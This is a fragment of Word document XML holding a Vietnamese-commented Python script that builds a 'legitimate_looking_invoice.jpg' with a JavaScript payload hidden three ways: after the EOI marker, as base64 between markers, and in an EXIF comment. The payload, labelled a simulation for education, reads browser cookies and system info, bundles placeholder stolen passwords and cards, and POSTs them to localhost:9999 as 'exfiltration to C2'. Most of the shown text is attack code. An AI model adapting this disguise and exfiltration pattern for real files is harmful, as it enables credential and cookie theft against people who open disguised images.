      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tạo file JPG chứa mã độc hoàn hảo cho mô phỏng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28054AFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424AD44">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405DD924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B17AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF8A0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672E4163">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def create_perfect_malicious_jpg():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82369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ĐANG TẠO FILE JPG ĐỘC HẠI HOÀN HẢO...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE0E59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0196D6D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Kiểm tra file JPG gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FB38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if not os.path.exists("legitimate.jpg"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD71BE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File 'legitimate.jpg' không tồn tại!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44378B9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Tạo file JPG mẫu nhỏ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6AA0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Tạo một file JPG minimal hợp lệ (ảnh 1x1 pixel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DAFEC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minimal_jpg = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F043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b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4C710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b'\xff\xdb\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\x09\x09'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEDCD1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b'\x08\x0a\x0c\x14\x0d\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D52B09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b'\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20\x22\x2c\x23\x1c\x1c\x28\x37'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFE23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b'\x29\x2c\x30\x31\x34\x34\x34\x1f\x27\x39\x3d\x38\x32\x3c\x2e\x33\x34'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF46AC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b'\x32\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703AD5B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b'\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4A2A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b'\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEBA18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b'\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B723CC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b'\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290E1D8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b'\x71\x14\x32\x81\x91\xa1\x08\x23\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697F94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b'\x62\x72\x82\x09\x0a\x16\x17\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF5845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b'\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686973C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b'\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17E93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b'\x77\x78\x79\x7a\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE4CF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b'\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64850DB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b'\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F468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b'\xd5\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530D85E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b'\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xda\x00\x08\x01\x01\x00\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC3261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b'\x3f\x00\xd2\xf8\x81\xe3\x8b\x7f\x01\xf8\x66\x5d\x4e\x58\xfc\xfb\x87'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C07D3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b'\x61\x15\xb4\x19\xc7\x99\x21\x04\x8c\x9e\xc0\x00\x49\xfa\x63\xa9\x15'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6BE2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b'\xf3\x5e\xbf\xe3\x7f\x12\x78\x9e\x66\x93\x57\xd6\x6e\xee\x15\x8e\x7c'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514AD9A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b'\x9f\x30\xac\x4b\xec\x10\x61\x47\xe5\x5c\xfd\x14\x51\x45\x14\x51\x45'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7D5B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b'\x14\x51\x45\x14\x51\x45\x14\x51\x45\x14\x51\x45\x14\x51\x45\x7d\x1d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B277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b'\xfb\x2e\x78\x9f\xed\x5a\x3e\xa5\xe1\x8b\x89\x33\x25\x9b\x8b\x9b\x60'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67298AE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b'\x4f\xfc\xb3\x6e\x18\x0f\xa3\x00\x7f\xe0\x75\xa9\xfb\x4a\x78\x9f\xfb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E541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b'\x2b\xc1\x76\xda\x1c\x12\x62\xe3\x54\x9b\x12\x00\x79\xf2\x93\x0c\xdf'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A04762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b'\xf8\xf1\x41\xf4\x26\xbe\x6b\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF16E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b'\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x2b\xd3\x3f\x67\xbf\x13\x7f'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCADAB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b'\xc2\x35\xf1\x4f\x4c\x32\x49\xb2\xdb\x50\xcd\x8c\xd9\x3c\x7c\xff\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B140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b'\x77\xff\x00\x1f\x0b\x5f\x61\x57\xc8\xff\x00\xb4\x87\x89\xbf\xb7\xbe'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635BA54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b'\x26\xcf\x67\x14\x9b\xad\xb4\xa8\x96\xd5\x70\x78\xdf\xf7\x9c\xfe\x6d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D051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b'\xb7\xfe\x02\x2b\xcd\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CDBE9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b'\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x2a\xc6\x9d\x7f\x71\xa5\x6a\x56'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B95DBC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b'\xff007\x54\x0c\x3f\x9d\x7c\x0b\xe3\x4d\x0e\x4f\x0d\x78\xcb\x58\xd1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E63B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b'\xa4\x52\xa6\xd2\xee\x48\x97\x3d\xd4\x31\xda\x7f\x11\x83\x58\xb4\x51'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B221A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b'\x45\x14\x51\x45\x14\x51\x45\x14\x51\x45\x14\x51\x45\x14\x51\x45\x14'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FAD0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b'\x51\x45\x15\xf6\xff\x00\xec\xf5\xe2\x6f\xf8\x49\x3e\x13\x69\x9e\x64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE98ED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b'\x9b\xee\x74\xfc\xd9\x4b\xcf\x23\x67\xdd\xff\x00\xc7\x0a\xd7\x9a\x7e'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE73A5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b'\xd7\x1e\x19\xf2\xb5\x4d\x1b\xc4\x90\xc7\xf2\xdc\x46\xd6\x93\xb0\x1f'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29017B1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b'\xc4\xa7\x72\x13\xf5\x0c\xc3\xfe\x02\x2b\xe7\x8a\x28\xa2\x8a\x28\xa2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB841E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b'\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xaf\xa8\xff'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC49E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b'\x00\x63\xff\x00\x13\x79\xfa\x46\xb3\xe1\x99\xa4\xcb\x5b\x4a\xb7\x70'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516189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b'\x02\x7f\x81\x86\xd7\x03\xe8\x42\x9f\xf8\x15\x7b\x07\xc5\xaf\x07\x7f'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7844BCB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b'\xc2\x6f\xf0\xef\x54\xd2\x23\x8f\x7d\xe0\x8f\xcf\xb4\xf5\xf3\x53\x95'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051797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b'\x03\xeb\xca\xff\x00\xc0\xab\xe1\x16\x52\xac\x55\x81\x0c\x0e\x08\x3d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19327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b'\xa9\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D07EC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b'\xa2\x8a\x28\xa2\xbd\x6b\xf6\x6a\xf1\x3f\xfc\x23\x7f\x16\x2c\x21\x96'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCA56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b'\x4d\x96\xda\x9a\x1b\x29\x32\x78\xcb\x7d\xdf\xfc\x88\x16\xbe\xdf\xaf'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EEC2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b'\x8f\xbf\x6a\x4f\x07\x7f\xc2\x3b\xf1\x29\xf5\x5b\x78\xb6\xd9\x6b\x31'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA3F4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b'\x8b\x95\x20\x70\x25\x18\x12\x0f\xcf\x0d\xff\x00\x02\xaf\x16\xa2\x8a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99C29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b'\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2\x8a\x28\xa2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8BE9C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b'\x8a\x2b\xd0\xbe\x07\x78\x9f\xfe\x11\x1f\x8a\x9a\x1e\xa4\xf2\x6c\xb7'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA5EED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b'\x79\xc5\xbc\xe7\x3c\x79\x72\x7c\x8c\x4f\xd3\x76\x7f\x0a\xfd\x11\xaf'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D11ED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b'\x3e\xf8\xcd\xe0\x7f\xf8\x58\x1f\x0e\x75\x1d\x26\x18\xc3\xdf\xc6\xbf'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06FB7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b'\x68\xb3\xf5\xf3\x50\x12\x00\xff\x00\x78\x65\x7f\xe0\x55\xf9\xee\xca'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C005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b'\x51\x8a\xb0\x21\x81\xc1\x07\xb5\x25\x14\x51\x45\x14\x51\x45\x14\x51'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC177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b'\x45\x14\x51\x45\x14\x51\x45\x14\x51\x45\x14\x57\xff\xd9'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393810B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2D0D2BB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AF4BCE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with open("legitimate.jpg", "wb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851D31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f.write(minimal_jpg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F09EEA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Đã tạo file JPG mẫu 1x1 pixel")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B6F6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553CE3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Đọc file JPG gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9C14D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with open("legitimate.jpg", "rb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C59D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jpg_data = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244F604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1923D0D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File JPG gốc: {len(jpg_data)} bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779D27E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0E09F20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Tạo mã độc JavaScript rõ ràng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A645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malicious_js = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818A2D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 MALICIOUS PAYLOAD - EDUCATIONAL PURPOSES ONLY ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62566F7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function executeMalware() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1DB5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console.log("[MALWARE] Starting simulation...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4474A1A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222C148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Simulate data collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB5A0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const systemInfo = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318446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os: navigator.platform,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A97D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userAgent: navigator.userAgent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4856222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language: navigator.language,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20ADD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cookies: document.cookie,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A6F6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screen: {width: screen.width, height: screen.height}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E545E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030924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376D71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Simulate browser data theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14282B5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const stolenData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CDC54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passwords: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D6C82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{url: "https://facebook.com", username: "user123", password: "pass123"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D84A6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{url: "https://gmail.com", username: "test@gmail.com", password: "emailpass"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6E27B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C5CF89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cookies: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C054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{domain: ".facebook.com", name: "session_id", value: "abc123session"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FDDC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{domain: ".google.com", name: "auth_token", value: "xyz789token"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9FA74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B3D5A98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01847DE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>creditCards: ["Visa **** 1234", "Mastercard **** 5678"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B207A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3D3E76C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100EC89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Combine all data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73CAD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const exfiltrationData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DB415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system_info: systemInfo,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715691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stolen_data: stolenData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22127C5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timestamp: new Date().toISOString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BB75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5B75429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C594A4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Simulate exfiltration to C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71260BD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fetch('http://localhost:9999/', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A659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method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A64D9C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headers: {'Content-Type': 'application/json'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F68C0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body: JSON.stringify(exfiltrationData)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73310F9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}).then(response =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEB76F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console.log("[MALWARE] Data exfiltrated successfully");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6308B92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}).catch(error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7FB7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console.log("[MALWARE] Exfiltration failed:", error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17793A6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2D395D9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C50B64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Simulate secondary payload download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCB9B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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1685344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console.log("[MALWARE] Downloading secondary payload...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78747C3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This would download actual malware in real attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B556F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3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263A6B0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CB7903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7EBA274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Execute the malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884955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executeMalware();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82AE4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 END MALICIOUS PAYLOAD ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38CB1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76401BA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EE6A44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Mã độc JavaScript đã tạo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B21B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0F9B96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Encode malware to base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5677C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encoded_malware = base64.b64encode(malicious_js.encode('utf-8')).decode('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57255E5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Mã độc base64: {len(encoded_malware)} ký tự")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB97D2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A64633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Tạo file JPG mới với nhiều phương pháp chứa mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3C7F7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with open("legitimate_looking_invoice.jpg", "wb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EA91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1. Ghi dữ liệu ảnh gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568525E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f.write(jpg_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02022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103469A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Đang thêm mã độc theo nhiều phương pháp...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321FF0CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t># 2. PHƯƠNG PHÁP 1: Thêm sau EOI marker (phổ biến nhất)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA39F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f.write(b'\xff\xd9')  # EOI marker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11578C2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3C505A3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3. PHƯƠNG PHÁP 2: Thêm base64 mã độc với marker rõ ràng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2FB4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malware_marker = b"===MALWARE_BASE64_START==="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451872B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f.write(malware_marker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE78D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f.write(encoded_malware.encode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D123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f.write(b"===MALWARE_BASE64_END===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6391DEA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5DA1DC8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4. PHƯƠNG PHÁP 3: Thêm comment section với mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934DA3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comment = b"UserComment: " + encoded_malware.encode('utf-8')[:100] + b"..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5914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comment_length = len(comment) + 2  # +2 for length bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5741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510248C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Write comment section (APP1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01210C7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f.write(b'\xff\xe1')  # APP1 marker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156F7A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f.write(struct.pack('&gt;H', comment_length))  # Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB4E7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f.write(b'Exif\x00\x00')  # Exif header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B50AD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f.write(comment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE76C7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03624BE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Đã thêm mã độc theo 3 phương pháp khác nhau")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5302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21BB471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Kiểm tra file mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541919C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new_size = os.path.getsize("legitimate_looking_invoice.jpg")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509CF21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size_increase = new_size - len(jpg_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D0D1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017BEB8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print("\n🎉 TẠO FILE THÀNH CÔNG!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D6797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 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3202253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File đã tạo: legitimate_looking_invoice.jpg")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6BE3A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Kích thước gốc: {len(jpg_data)} bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46145A9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Kích thước mới: {new_size} bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FEC39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Tăng thêm: {size_increase} bytes (mã độc)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4DB88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Phương pháp chứa mã độc:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB647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1. Sau EOI marker với base64")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C524E3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2. Trong EXIF comment section") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E74A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3. Với markers rõ ràng để dễ phát hiện")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177120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 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083571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17D75AB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return "legitimate_looking_invoice.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD98F6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D4154E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CA9D7">
      <w:pPr>
        <w:ind w:firstLine="260"/>
